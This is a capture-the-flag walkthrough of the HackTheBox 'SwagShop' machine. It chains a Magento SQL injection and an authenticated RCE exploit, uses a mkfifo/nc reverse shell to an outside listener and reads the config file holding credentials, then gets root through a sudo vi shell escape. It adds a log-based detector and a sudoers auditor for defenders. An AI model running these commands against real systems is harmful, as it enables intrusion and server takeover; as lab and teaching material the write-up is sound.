An easy Linux box from HackTheBox: chain two CVEs on Magento to get initial access, then abuse sudo privileges on vi to get root.

Recon

Running the usual nmap

georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.140

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6552bd24e8fa3817261379a12f624ec (RSA)
|   256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_  256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not much to see at all, so start an nmap on all ports in the background while we look at the webapp

georgy@pop-os:~/Documents/htb/swagshop$ sudo nmap -T4 -p- -o nmap/allports 10.10.10.140

Don't get any response from the webapp, besides the URL being changed to “swagshop.htb”, so add that to /etc/hosts and navigate to http://swagshop.htb

And see a Magento store, seemingly from 2014 judging by the footer

Google around for a Magento scanner, and come across this one

Git clone it, and download the .phar file

georgy@pop-os:~/Documents/htb/swagshop$ php magescan.phar scan:all swagshop.htb

+-----------+------------------+
| Parameter | Value            |
+-----------+------------------+
| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+

Don’t get much useful info besides the version, so google around for 1.9.0.0 and 1.9.0.1 Magento exploits

Come across this exploit and git clone it into the working directory

Exploitation

The exploit needs a small modification to get it to work

The exploit works as a SQL injection against the admin login form, which it uses to create a new admin user

Naturally, this means that the URL must be that of the admin page, so change

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

To

target_url = target + "/index.php/admin/"

And run it with

georgy@pop-os:~/Documents/htb/swagshop/Magento-Shoplift-SQLI$ python2.7 poc.py swagshop.htb
WORKED
Check http://swagshop.htb/admin with creds ypwq:123

So then we get an admin login to Magento, but this alone doesn’t get us code exec on the box

Running a quick searchsploit on Magento to see if I missed a true RCE

georgy@pop-os:~/Documents/htb/swagshop$ searchsploit magento

...
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
....

Now that we have admin creds, maybe we can chain it with this exploit?

Looking at it, a few things have to change, notably the values in the commented “Config” section of the exploit

This exploit also utilises the admin login, so the admin URL has to be used when running it

# Config.
username = 'ypwq'
password = '123'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

Change the username and password to the output of the first exploit; for the install date, use the date inside /app/etc/local.xml

Can use curl for this

curl -s http://swagshop.htb/app/etc/local.xml | grep date

<date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>

And paste the date in like above
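From the defender's side, both the readable local.xml and the admin endpoints the two PoCs hit leave traces in the web server's access log. The following is an added example, not code from the write-up or from either PoC: it runs simple detection logic over constructed Apache combined-format log lines (client addresses, timestamps and user agents are made up; the paths are the ones the PoCs and the curl command above actually touch) and flags requests matching those indicators. Magento 1 normally ships a .htaccess in app/etc/ that denies web access to that directory, so a 200 for local.xml points to that rule not being applied.

```python
"""Flag the web-log traces of the two Magento exploits used above.

Added example for this write-up, not code from the box or either PoC.  The
log lines are constructed Apache combined-format entries: the client IPs,
timestamps and user agents are made up; the paths are the ones the PoCs and
the curl command above actually touch.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php/ HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2020:10:01:12 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 512 "-" "python-requests/2.21.0"
203.0.113.5 - - [01/Jan/2020:10:02:30 +0000] "GET /app/etc/local.xml HTTP/1.1" 200 2048 "-" "curl/7.64.0"
203.0.113.5 - - [01/Jan/2020:10:03:05 +0000] "POST /index.php/admin/ HTTP/1.1" 302 0 "-" "python-requests/2.21.0"
198.51.100.9 - - [01/Jan/2020:10:03:07 +0000] "GET /skin/frontend/default/default/css/styles.css HTTP/1.1" 200 8000 "http://swagshop.htb/" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2020:10:04:00 +0000] "GET /app/etc/local.xml HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse(line):
    """Return the fields of one log line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the indicator tags a single request matches (possibly several)."""
    tags = []
    path = entry["path"].split("?", 1)[0]
    status = int(entry["status"])
    # app/etc/ holds local.xml (DB credentials, crypt key, install date).  It
    # must never be served; a 200 here means the deny rule is not in effect.
    if path.startswith("/app/etc/"):
        tags.append("config-exposed" if status == 200 else "config-probe")
    # Endpoint the Shoplift SQLi PoC posts to, per its original target_url.
    if entry["method"] == "POST" and "/Cms_Wysiwyg/directive/" in path:
        tags.append("shoplift-sqli-pattern")
    # Heuristic: admin-area POSTs from a non-browser user agent.
    if (entry["method"] == "POST" and "/admin" in path
            and not entry["ua"].startswith("Mozilla")):
        tags.append("scripted-admin-post")
    return tags


def detect(lines):
    """Map client IP -> list of (tag, path) for every line that matched a rule."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        for tag in classify(entry):
            hits[entry["ip"]].append((tag, entry["path"]))
    return dict(hits)


def chained(hits):
    """Clients that both read the config file and worked the admin area: the
    combination the second exploit above depends on (admin creds + install date)."""
    out = []
    for ip, items in hits.items():
        tags = {t for t, _ in items}
        if "config-exposed" in tags and tags & {"shoplift-sqli-pattern", "scripted-admin-post"}:
            out.append(ip)
    return sorted(out)


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG.splitlines())
    for ip, items in hits.items():
        for tag, path in items:
            print(ip, tag, path)
    print("chained activity from:", chained(hits))
```

The config-exposed rule is the actionable one: a 200 on anything under /app/etc/ is a misconfiguration regardless of who requested it, and it is what makes the authenticated RCE usable here, since that exploit needs the install date from local.xml. The user-agent heuristic is just a hint and will miss anyone who sets a browser-like agent.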

Now run the exploit with

georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "whoami"
www-data

And have code exec! To upgrade to a reverse shell, use a mkfifo + nc reverse shell and start a listener on 8888

georgy@pop-os:~/Documents/htb/swagshop$ python2.7 37811.py "http://swagshop.htb/index.php/admin" "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"

And catch the shell

Connection received on 10.10.10.140 43202
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

And upgrade the terminal with the usual python3 pty

$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@swagshop:/var/www/html$ export TERM=xterm

CTRL+Z

georgy@pop-os:~/Documents/htb/swagshop$ stty raw -echo;fg

Doing basic enumeration, see that www-data can run vi with sudo as root

www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

So let's do just that

www-data@swagshop:/var/www/html$ sudo -u root /usr/bin/vi /var/www/html/root

Then inside vi, start a shell with “:!/bin/sh”

And get a shell as root!

# whoami
root
#
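The sudo rule that made the last step trivial is the kind of thing a sudoers audit should catch before anyone else does. The following is an added example, not code from the write-up or from any tool it uses: it parses constructed sudoers text (the www-data line mirrors the `sudo -l` output above, the other lines are invented for contrast) and flags commands that can spawn a shell, that carry a wildcard argument, or that require no password, and proposes a sudoedit form for editor grants. The list of shell-capable binaries is a small illustrative set, not a complete one.

```python
"""Audit sudoers rules for grants that amount to a root shell.

Added example for this write-up, not code from the box or from any tool it
uses.  The sample rules are constructed: the www-data line mirrors the
`sudo -l` output above, the other lines are invented.  The set of
shell-capable binaries is a small illustrative list, not a complete one.
"""
import re

# Editors and pagers with an in-program shell escape or arbitrary file write:
# granting any of these as root grants a root shell.  Illustrative subset only.
SHELL_CAPABLE = {"vi", "vim", "view", "nano", "less", "more"}

SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset, mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root     ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup   ALL=(root) /usr/bin/rsync -a /var/www/ /srv/backup/
"""

# user  host = (runas) TAG: cmd, cmd   -- the common single-line rule shape
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rules(text):
    """Return one dict per user-specification line; Defaults and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "user": m.group("user"),
            "runas": m.group("runas") or "root",
            "tags": tags,
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(text):
    """Flag commands that hand out a shell or match more paths than intended."""
    findings = []
    for rule in parse_rules(text):
        for cmd in rule["commands"]:
            parts = cmd.split()
            name = parts[0].rsplit("/", 1)[-1]
            reasons = []
            if name in SHELL_CAPABLE:
                reasons.append("%s can spawn a shell, so this is a %s shell"
                               % (name, rule["runas"]))
            if any("*" in arg for arg in parts[1:]):
                # sudo's '*' matches '/' as well, so /var/www/html/* is not
                # confined to that directory (sudoers(5), Wildcards).
                reasons.append("wildcard in argument: pattern is wider than the directory it names")
            if reasons and "NOPASSWD" in rule["tags"]:
                reasons.append("NOPASSWD: no authentication required")
            if reasons:
                findings.append({"user": rule["user"], "runas": rule["runas"],
                                 "command": cmd, "reasons": reasons})
    return findings


def suggest(finding):
    """Safer shape for an editor grant: sudoedit edits a temporary copy with the
    editor running as the invoking user, so ':!sh' is not a root shell.  The
    password requirement is restored; any wildcard is kept as-is here and
    should be replaced with explicit file paths."""
    args = finding["command"].split()[1:]
    return "%s ALL=(%s) sudoedit %s" % (finding["user"], finding["runas"], " ".join(args))


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print("%s -> %s" % (f["user"], f["command"]))
        for r in f["reasons"]:
            print("    -", r)
        print("  suggested:", suggest(f))
```

sudoedit keeps the editor running as the invoking user and copies the temporary file back as root afterwards, so an in-editor shell escape does not cross the privilege boundary. For a service account like www-data the better answer is usually no sudo grant at all; sudoedit fits the case where a human administrator genuinely needs to edit root-owned files. The wildcard finding is worth acting on separately: sudo's `*` also matches `/`, so a pattern like `/var/www/html/*` covers more than that one directory.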